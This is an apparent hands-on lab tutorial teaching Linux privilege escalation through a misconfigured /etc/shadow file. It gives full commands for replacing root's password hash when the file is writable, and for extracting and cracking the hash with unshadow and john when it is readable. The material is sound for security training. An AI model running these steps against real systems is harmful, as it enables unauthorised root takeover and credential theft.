Escalate Privileges Using /etc/shadow File in Linux

Introduction

Linux systems rely on the /etc/passwd and /etc/shadow files for user authentication and access control. If system administrators misconfigure permissions or contents of these files, it can create opportunities for privilege escalation attacks. In this lab, you will learn how to leverage the /etc/shadow file to gain root privileges on a Linux system. This scenario assumes you have already obtained initial low-privileged shell access as a regular user.

Understand the /etc/shadow File

In this step, you will learn about the structure and purpose of the /etc/shadow file.

The /etc/shadow file stores encrypted passwords and password-related configuration information for each user account. Each line in the file represents one user and contains 9 colon-separated fields:

Username
Encrypted password hash
The number of days since the epoch (1970-01-01) that the password was last changed
The minimum number of days required between password changes
The maximum number of days the password is valid
The number of days before password expiration to warn the user
The number of days after password expiration before the account is disabled
The number of days since the epoch (1970-01-01) that the account will be disabled
A reserved field for future use

Open a terminal and navigate to the /home/labex/project directory.

cd /home/labex/project

Let's check the labex user's entry in the /etc/shadow file:

sudo cat /etc/shadow | grep labex > /home/labex/project/labex_shadow.txt

Notice that we used sudo to read the /etc/shadow file. This is because the file is only readable by the root user.

Check the contents of the labex_shadow.txt file:

cat labex_shadow.txt

Example output:

labex:$y$j9T$enO.7A1WiUBiOvRdw4gox0$cCOqZqHAQgLkhPb.NDJO9zO6T3EUQ3.AeE0amN57AZ8:19818:0:99999:7:::

This line indicates:

Username: labex
Encrypted password hash: $y$j9T$enO.7A1WiUBiOvRdw4gox0$cCOqZqHAQgLkhPb.NDJO9zO6T3EUQ3.AeE0amN57AZ8
Last password change: 19818 days since the epoch (1970-01-01)
Minimum password age: 0 days (no restriction)
Maximum password age: 99999 days (no expiration)
Password warning period: 7 days before expiration
Account never expires

By default, only the root user can read and modify the /etc/shadow file. However, misconfigured permissions can sometimes provide opportunities for privilege escalation.

Escalate Privileges with Write Access to /etc/shadow

In this step, you will learn how to escalate privileges by modifying the root password in the /etc/shadow file if you have write access to it.

First, open a terminal and navigate to the /home/labex/project directory:
```
cd /home/labex/project
```
You will found a script named env_setup_1.sh in the directory. Run this script to set up the environment:
```
./env_setup_1.sh
```
This will set up the environment and switch you to the user001 user, simulating an initial low-privileged shell access.

Navigate to the user001 home directory:
```
cd ~
```
Next, check the permissions of the /etc/shadow file:
```
ls -alh /etc/shadow
```
Example output:
```
-rw-r----- 1 user001 shadow 1.2K Apr 6 19:16 /etc/shadow
```
You should see that the user001 user has write access to the /etc/shadow file due to a misconfiguration.
Now, you can edit the /etc/shadow file and replace the root user's password hash with a new one.

First, view the current root password hash:
```
cat /etc/shadow | grep root
```
Example output:
```
root:**$6$5PfZMEbQ$pCjxwZagiIqsrkL4V6r3flOiKQrheDV5eup3zicnvBSKPItaddhUfDAVA5GWAYUHX9LQ5kXzLH8ehoUno2qkE/**:18167:0:99999:7:::
```
To set a new password (e.g., pass123), generate a new password hash using the openssl utility:
```
openssl passwd -1 -salt ignite pass123
```
Example output:
```
$1$ignite$3eTbJm98O9Hz.k1NTdNxe1
```
Open the /etc/shadow file in a text editor and replace the root user's password hash with the new one.
```
nano /etc/shadow
```
Found the root user's password hash:
```
root:**$6$5PfZMEbQ$pCjxwZagiIqsrkL4V6r3flOiKQrheDV5eup3zicnvBSKPItaddhUfDAVA5GWAYUHX9LQ5kXzLH8ehoUno2qkE/**:18167:0:99999:7:::
```
Replace the password hash with the new one:
```
root:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:18167:0:99999:7:::
```
Save the changes and exit the editor.
Finally, use the su root command to switch to the root user, entering the new password pass123 when prompted.
```
su root
```

You should now have root privileges on the system.

Escalate Privileges with Read Access to /etc/shadow

In this step, you will learn how to escalate privileges by cracking the root password hash if you only have read access to the /etc/shadow file.

After last step, you should stay in the root user. You can open a new terminal or use exit command to logout current user till you reach the labex user.

When you are in the labex user, navigate to the /home/labex/project directory:
```
cd /home/labex/project
```
Run the env_setup_2.sh script to set up the environment:
```
./env_setup_2.sh
```
This will set up a new environment where the user001 user has read access to the /etc/shadow file.

Navigate to the user001 home directory:
```
cd ~
```
Verify the permissions of the /etc/shadow file:
```
ls -alh /etc/shadow
```
Example output:
```
-rw-r--r-- 1 root shadow 1.2K Apr 6 19:19 /etc/shadow
```
You should see that the user001 user has read access to the /etc/shadow file due to a misconfiguration.
Next, we can use the john tool to crack the root user's password hash. Before using john, you need to combine the contents of the /etc/passwd and /etc/shadow files using the unshadow command:
```
unshadow /etc/passwd /etc/shadow > ~/shadow_crack.txt
```
Now, run john on the shadow_crack.txt file to crack the root user's password hash and save the cracked passwords to a file:
```
john --users=root shadow_crack.txt > cracked_passwords.txt
```
Check the contents of the cracked_passwords.txt file to view the cracked password:
```
Loaded 1 password hash (md5crypt [MD5 32/64 X2])
study            (root)
```
Finally, use the su root command to switch to the root user, entering the cracked password study when prompted:
```
su root
```

You should now have root privileges on the system.

Summary

In this lab, you learned about the structure and purpose of the /etc/shadow file, as well as two methods for escalating privileges by leveraging this file: modifying the root password hash with write access, or cracking the root password hash with read access. These techniques demonstrate the importance of properly configuring file permissions and securing sensitive system files in a Linux environment.